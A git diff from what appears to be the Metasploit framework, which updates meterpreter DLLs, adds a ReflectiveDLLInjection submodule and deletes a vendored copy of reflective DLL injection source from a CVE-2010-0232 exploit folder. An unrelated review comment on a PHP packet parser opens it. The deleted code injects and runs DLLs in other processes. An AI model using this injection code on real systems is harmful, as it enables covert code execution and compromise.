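Review bot: `packet_get_all_tlvs` stops on a `null` from `tlv_unpack` but never checks `$tlv['len']`, so an entry whose length field is 0 (or anything below the 8-byte header) leaves `$offset` unchanged and the `while` loop spins forever on a malformed packet; extend the guard to `if ($tlv == NULL || $tlv['len'] < 8) { break; }`. Because `tlv_unpack` also returns `null` for group and complex meta types, that `break` silently discards every TLV after the first such entry rather than skipping it, which a caller such as the new getenv handler would see as a shorter variable list. The two `my_print` calls run for every entry of every packet; in a deployed agent that is a lot of output for a parser hot path, so I would comment them out the way the `#my_print` lines in `packet_get_tlv` are.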
diff --git a/data/meterpreter/metsrv.x64.dll b/data/meterpreter/metsrv.x64.dll
index 9068259a47..6dc9743a18 100755
Binary files a/data/meterpreter/metsrv.x64.dll and b/data/meterpreter/metsrv.x64.dll differ
diff --git a/data/meterpreter/metsrv.x86.dll b/data/meterpreter/metsrv.x86.dll
index 91f367cd7e..aeb272a4b6 100755
Binary files a/data/meterpreter/metsrv.x86.dll and b/data/meterpreter/metsrv.x86.dll differ
diff --git a/data/meterpreter/screenshot.x64.dll b/data/meterpreter/screenshot.x64.dll
index c192eb02b4..5b95b74cd4 100755
Binary files a/data/meterpreter/screenshot.x64.dll and b/data/meterpreter/screenshot.x64.dll differ
diff --git a/data/meterpreter/screenshot.x86.dll b/data/meterpreter/screenshot.x86.dll
index ac20375a8d..1b47d33810 100755
Binary files a/data/meterpreter/screenshot.x86.dll and b/data/meterpreter/screenshot.x86.dll differ
diff --git a/external/source/ReflectiveDLLInjection b/external/source/ReflectiveDLLInjection
new file mode 160000
index 0000000000..88e8e5f109
--- /dev/null
+++ b/external/source/ReflectiveDLLInjection
@@ -0,0 +1 @@
+Subproject commit 88e8e5f109793f09b35cb17a621f33647d644103
diff --git a/external/source/ReflectiveDllInjection_v1.0.zip b/external/source/ReflectiveDllInjection_v1.0.zip
deleted file mode 100644
index 883acde770..0000000000
Binary files a/external/source/ReflectiveDllInjection_v1.0.zip and /dev/null differ
diff --git a/external/source/exploits/CVE-2010-0232/common/GetProcAddressR.c b/external/source/exploits/CVE-2010-0232/common/GetProcAddressR.c
deleted file mode 100644
index a88d1d946e..0000000000
--- a/external/source/exploits/CVE-2010-0232/common/GetProcAddressR.c
+++ /dev/null
@@ -1,116 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. 
-//===============================================================================================// -#include "GetProcAddressR.h" -//===============================================================================================// -// We implement a minimal GetProcAddress to avoid using the native kernel32!GetProcAddress which -// wont be able to resolve exported addresses in reflectivly loaded librarys. -FARPROC WINAPI GetProcAddressR( HANDLE hModule, LPCSTR lpProcName ) -{ - UINT_PTR uiLibraryAddress = 0; - FARPROC fpResult = NULL; - - if( hModule == NULL ) - return NULL; - - // a module handle is really its base address - uiLibraryAddress = (UINT_PTR)hModule; - - __try - { - UINT_PTR uiAddressArray = 0; - UINT_PTR uiNameArray = 0; - UINT_PTR uiNameOrdinals = 0; - PIMAGE_NT_HEADERS pNtHeaders = NULL; - PIMAGE_DATA_DIRECTORY pDataDirectory = NULL; - PIMAGE_EXPORT_DIRECTORY pExportDirectory = NULL; - - // get the VA of the modules NT Header - pNtHeaders = (PIMAGE_NT_HEADERS)(uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew); - - pDataDirectory = (PIMAGE_DATA_DIRECTORY)&pNtHeaders->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; - - // get the VA of the export directory - pExportDirectory = (PIMAGE_EXPORT_DIRECTORY)( uiLibraryAddress + pDataDirectory->VirtualAddress ); - - // get the VA for the array of addresses - uiAddressArray = ( uiLibraryAddress + pExportDirectory->AddressOfFunctions ); - - // get the VA for the array of name pointers - uiNameArray = ( uiLibraryAddress + pExportDirectory->AddressOfNames ); - - // get the VA for the array of name ordinals - uiNameOrdinals = ( uiLibraryAddress + pExportDirectory->AddressOfNameOrdinals ); - - // test if we are importing by name or by ordinal... - if( ((DWORD)lpProcName & 0xFFFF0000 ) == 0x00000000 ) - { - // import by ordinal... 
- - // use the import ordinal (- export ordinal base) as an index into the array of addresses - uiAddressArray += ( ( IMAGE_ORDINAL( (DWORD)lpProcName ) - pExportDirectory->Base ) * sizeof(DWORD) ); - - // resolve the address for this imported function - fpResult = (FARPROC)( uiLibraryAddress + DEREF_32(uiAddressArray) ); - } - else - { - // import by name... - DWORD dwCounter = pExportDirectory->NumberOfNames; - while( dwCounter-- ) - { - char * cpExportedFunctionName = (char *)(uiLibraryAddress + DEREF_32( uiNameArray )); - - // test if we have a match... - if( strcmp( cpExportedFunctionName, lpProcName ) == 0 ) - { - // use the functions name ordinal as an index into the array of name pointers - uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) ); - - // calculate the virtual address for the function - fpResult = (FARPROC)(uiLibraryAddress + DEREF_32( uiAddressArray )); - - // finish... - break; - } - - // get the next exported function name - uiNameArray += sizeof(DWORD); - - // get the next exported function name ordinal - uiNameOrdinals += sizeof(WORD); - } - } - } - __except( EXCEPTION_EXECUTE_HANDLER ) - { - fpResult = NULL; - } - - return fpResult; -} -//===============================================================================================// diff --git a/external/source/exploits/CVE-2010-0232/common/GetProcAddressR.h b/external/source/exploits/CVE-2010-0232/common/GetProcAddressR.h deleted file mode 100644 index 6f4729dd5d..0000000000 --- a/external/source/exploits/CVE-2010-0232/common/GetProcAddressR.h +++ /dev/null 
@@ -1,36 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. 
-//===============================================================================================// -#ifndef _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H -#define _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H -//===============================================================================================// -#include "ReflectiveDLLInjection.h" - -FARPROC WINAPI GetProcAddressR( HANDLE hModule, LPCSTR lpProcName ); -//===============================================================================================// -#endif -//===============================================================================================// diff --git a/external/source/exploits/CVE-2010-0232/common/LoadLibraryR.c b/external/source/exploits/CVE-2010-0232/common/LoadLibraryR.c deleted file mode 100644 index 88d5be96b9..0000000000 --- a/external/source/exploits/CVE-2010-0232/common/LoadLibraryR.c +++ /dev/null 
@@ -1,233 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. 
-//===============================================================================================// -#include "LoadLibraryR.h" -//===============================================================================================// -DWORD Rva2Offset( DWORD dwRva, UINT_PTR uiBaseAddress ) -{ - WORD wIndex = 0; - PIMAGE_SECTION_HEADER pSectionHeader = NULL; - PIMAGE_NT_HEADERS pNtHeaders = NULL; - - pNtHeaders = (PIMAGE_NT_HEADERS)(uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew); - - pSectionHeader = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&pNtHeaders->OptionalHeader) + pNtHeaders->FileHeader.SizeOfOptionalHeader); - - if( dwRva < pSectionHeader[0].PointerToRawData ) - return dwRva; - - for( wIndex=0 ; wIndex < pNtHeaders->FileHeader.NumberOfSections ; wIndex++ ) - { - if( dwRva >= pSectionHeader[wIndex].VirtualAddress && dwRva < (pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].SizeOfRawData) ) - return ( dwRva - pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].PointerToRawData ); - } - - return 0; -} -//===============================================================================================// -DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer ) -{ - UINT_PTR uiBaseAddress = 0; - UINT_PTR uiExportDir = 0; - UINT_PTR uiNameArray = 0; - UINT_PTR uiAddressArray = 0; - UINT_PTR uiNameOrdinals = 0; - DWORD dwCounter = 0; -#ifdef _WIN64 - DWORD dwMeterpreterArch = 2; -#else - // This will catch Win32 and WinRT. - DWORD dwMeterpreterArch = 1; -#endif - - uiBaseAddress = (UINT_PTR)lpReflectiveDllBuffer; - - // get the File Offset of the modules NT Header - uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew; - - // currenlty we can only process a PE file which is the same type as the one this fuction has - // been compiled as, due to various offset in the PE structures being defined at compile time. 
- if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x010B ) // PE32 - { - if( dwMeterpreterArch != 1 ) - return 0; - } - else if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x020B ) // PE64 - { - if( dwMeterpreterArch != 2 ) - return 0; - } - else - { - return 0; - } - - // uiNameArray = the address of the modules export directory entry - uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; - - // get the File Offset of the export directory - uiExportDir = uiBaseAddress + Rva2Offset( ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress, uiBaseAddress ); - - // get the File Offset for the array of name pointers - uiNameArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames, uiBaseAddress ); - - // get the File Offset for the array of addresses - uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress ); - - // get the File Offset for the array of name ordinals - uiNameOrdinals = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals, uiBaseAddress ); - - // get a counter for the number of exported functions... 
- dwCounter = ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->NumberOfNames; - - // loop through all the exported functions to find the ReflectiveLoader - while( dwCounter-- ) - { - char * cpExportedFunctionName = (char *)(uiBaseAddress + Rva2Offset( DEREF_32( uiNameArray ), uiBaseAddress )); - - if( strstr( cpExportedFunctionName, "ReflectiveLoader" ) != NULL ) - { - // get the File Offset for the array of addresses - uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress ); - - // use the functions name ordinal as an index into the array of name pointers - uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) ); - - // return the File Offset to the ReflectiveLoader() functions code... - return Rva2Offset( DEREF_32( uiAddressArray ), uiBaseAddress ); - } - // get the next exported function name - uiNameArray += sizeof(DWORD); - - // get the next exported function name ordinal - uiNameOrdinals += sizeof(WORD); - } - - return 0; -} -//===============================================================================================// -// Loads a DLL image from memory via its exported ReflectiveLoader function -HMODULE WINAPI LoadLibraryR( LPVOID lpBuffer, DWORD dwLength ) -{ - HMODULE hResult = NULL; - DWORD dwReflectiveLoaderOffset = 0; - DWORD dwOldProtect1 = 0; - DWORD dwOldProtect2 = 0; - REFLECTIVELOADER pReflectiveLoader = NULL; - DLLMAIN pDllMain = NULL; - - if( lpBuffer == NULL || dwLength == 0 ) - return NULL; - - __try - { - // check if the library has a ReflectiveLoader... - dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpBuffer ); - if( dwReflectiveLoaderOffset != 0 ) - { - pReflectiveLoader = (REFLECTIVELOADER)((UINT_PTR)lpBuffer + dwReflectiveLoaderOffset); - - // we must VirtualProtect the buffer to RWX so we can execute the ReflectiveLoader... 
- // this assumes lpBuffer is the base address of the region of pages and dwLength the size of the region - if( VirtualProtect( lpBuffer, dwLength, PAGE_EXECUTE_READWRITE, &dwOldProtect1 ) ) - { - // call the librarys ReflectiveLoader... - pDllMain = (DLLMAIN)pReflectiveLoader(); - if( pDllMain != NULL ) - { - // call the loaded librarys DllMain to get its HMODULE - // Dont call DLL_METASPLOIT_ATTACH/DLL_METASPLOIT_DETACH as that is for payloads only. - if( !pDllMain( NULL, DLL_QUERY_HMODULE, &hResult ) ) - hResult = NULL; - } - // revert to the previous protection flags... - VirtualProtect( lpBuffer, dwLength, dwOldProtect1, &dwOldProtect2 ); - } - } - } - __except( EXCEPTION_EXECUTE_HANDLER ) - { - hResult = NULL; - } - - return hResult; -} -//===============================================================================================// -// Loads a PE image from memory into the address space of a host process via the image's exported ReflectiveLoader function -// Note: You must compile whatever you are injecting with REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR -// defined in order to use the correct RDI prototypes. -// Note: The hProcess handle must have these access rights: PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | -// PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ -// Note: If you are passing in an lpParameter value, if it is a pointer, remember it is for a different address space. -// Note: This function currently cant inject accross architectures, but only to architectures which are the -// same as the arch this function is compiled as, e.g. x86->x86 and x64->x64 but not x64->x86 or x86->x64. 
-HANDLE WINAPI LoadRemoteLibraryR( HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter ) -{ - LPVOID lpRemoteLibraryBuffer = NULL; - LPTHREAD_START_ROUTINE lpReflectiveLoader = NULL; - HANDLE hThread = NULL; - DWORD dwReflectiveLoaderOffset = 0; - DWORD dwThreadId = 0; - - __try - { - do - { - if( !hProcess || !lpBuffer || !dwLength ) - break; - - // check if the library has a ReflectiveLoader... - dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpBuffer ); - if( !dwReflectiveLoaderOffset ) - break; - - // alloc memory (RWX) in the host process for the image... - lpRemoteLibraryBuffer = VirtualAllocEx( hProcess, NULL, dwLength, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE ); - if( !lpRemoteLibraryBuffer ) - break; - - // write the image into the host process... - if( !WriteProcessMemory( hProcess, lpRemoteLibraryBuffer, lpBuffer, dwLength, NULL ) ) - break; - - // add the offset to ReflectiveLoader() to the remote library address... - lpReflectiveLoader = (LPTHREAD_START_ROUTINE)( (ULONG_PTR)lpRemoteLibraryBuffer + dwReflectiveLoaderOffset ); - - // create a remote thread in the host process to call the ReflectiveLoader! - hThread = CreateRemoteThread( hProcess, NULL, 1024*1024, lpReflectiveLoader, lpParameter, (DWORD)NULL, &dwThreadId ); - - } while( 0 ); - - } - __except( EXCEPTION_EXECUTE_HANDLER ) - { - hThread = NULL; - } - - return hThread; -} -//===============================================================================================// diff --git a/external/source/exploits/CVE-2010-0232/common/LoadLibraryR.h b/external/source/exploits/CVE-2010-0232/common/LoadLibraryR.h deleted file mode 100644 index ad57808084..0000000000 --- a/external/source/exploits/CVE-2010-0232/common/LoadLibraryR.h +++ /dev/null 
@@ -1,41 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. 
-//===============================================================================================// -#ifndef _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_LOADLIBRARYR_H -#define _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_LOADLIBRARYR_H -//===============================================================================================// -#include "ReflectiveDLLInjection.h" - -DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer ); - -HMODULE WINAPI LoadLibraryR( LPVOID lpBuffer, DWORD dwLength ); - -HANDLE WINAPI LoadRemoteLibraryR( HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter ); - -//===============================================================================================// -#endif -//===============================================================================================// diff --git a/external/source/exploits/CVE-2010-0232/common/ReflectiveDLLInjection.h b/external/source/exploits/CVE-2010-0232/common/ReflectiveDLLInjection.h deleted file mode 100644 index 23d607ee00..0000000000 --- a/external/source/exploits/CVE-2010-0232/common/ReflectiveDLLInjection.h +++ /dev/null 
@@ -1,53 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. 
-//===============================================================================================// -#ifndef _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H -#define _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H -//===============================================================================================// -#define WIN32_LEAN_AND_MEAN -#include - -// we declare some common stuff in here... - -#define DLL_METASPLOIT_ATTACH 4 -#define DLL_METASPLOIT_DETACH 5 -#define DLL_QUERY_HMODULE 6 - -#define DEREF( name )*(UINT_PTR *)(name) -#define DEREF_64( name )*(DWORD64 *)(name) -#define DEREF_32( name )*(DWORD *)(name) -#define DEREF_16( name )*(WORD *)(name) -#define DEREF_8( name )*(BYTE *)(name) - -typedef UINT_PTR (WINAPI * REFLECTIVELOADER)( VOID ); -typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID ); - -#define DLLEXPORT __declspec( dllexport ) - -//===============================================================================================// -#endif -//===============================================================================================// diff --git a/external/source/exploits/CVE-2010-0232/common/ReflectiveLoader.c b/external/source/exploits/CVE-2010-0232/common/ReflectiveLoader.c deleted file mode 100644 index a302e3903d..0000000000 --- a/external/source/exploits/CVE-2010-0232/common/ReflectiveLoader.c +++ /dev/null 
@@ -1,599 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. 
-//===============================================================================================// -#include "ReflectiveLoader.h" -//===============================================================================================// -// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value -HINSTANCE hAppInstance = NULL; -//===============================================================================================// -#pragma intrinsic( _ReturnAddress ) -// This function can not be inlined by the compiler or we will not get the address we expect. Ideally -// this code will be compiled with the /O2 and /Ob1 switches. Bonus points if we could take advantage of -// RIP relative addressing in this instance but I dont believe we can do so with the compiler intrinsics -// available (and no inline asm available under x64). -__declspec(noinline) ULONG_PTR caller( VOID ) { return (ULONG_PTR)_ReturnAddress(); } -//===============================================================================================// - -#ifdef ENABLE_OUTPUTDEBUGSTRING -#define OUTPUTDBG(str) pOutputDebug((LPCSTR)str) -#else /* ENABLE_OUTPUTDEBUGSTRING */ -#define OUTPUTDBG(str) do{}while(0) -#endif - -// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN, -// otherwise the DllMain at the end of this file will be used. - -// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR, -// otherwise it is assumed you are calling the ReflectiveLoader via a stub. 
- -// This is our position independent reflective DLL loader/injector -#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR -DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( LPVOID lpParameter ) -#else -DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( VOID ) -#endif -{ - // the functions we need - LOADLIBRARYA pLoadLibraryA = NULL; - GETPROCADDRESS pGetProcAddress = NULL; - VIRTUALALLOC pVirtualAlloc = NULL; - NTFLUSHINSTRUCTIONCACHE pNtFlushInstructionCache = NULL; -#ifdef ENABLE_STOPPAGING - VIRTUALLOCK pVirtualLock = NULL; -#endif -#ifdef ENABLE_OUTPUTDEBUGSTRING - OUTPUTDEBUG pOutputDebug = NULL; -#endif - - USHORT usCounter; - - // the initial location of this image in memory - ULONG_PTR uiLibraryAddress; - // the kernels base address and later this images newly loaded base address - ULONG_PTR uiBaseAddress; - - // variables for processing the kernels export table - ULONG_PTR uiAddressArray; - ULONG_PTR uiNameArray; - ULONG_PTR uiExportDir; - ULONG_PTR uiNameOrdinals; - DWORD dwHashValue; - - // variables for loading this image - ULONG_PTR uiHeaderValue; - ULONG_PTR uiValueA; - ULONG_PTR uiValueB; - ULONG_PTR uiValueC; - ULONG_PTR uiValueD; - ULONG_PTR uiValueE; - - // STEP 0: calculate our images current base address - - // we will start searching backwards from our callers return address. - uiLibraryAddress = caller(); - - // loop through memory backwards searching for our images base address - // we dont need SEH style search as we shouldnt generate any access violations with this - while( TRUE ) - { - if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE ) - { - uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; - // some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'), - // we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems. 
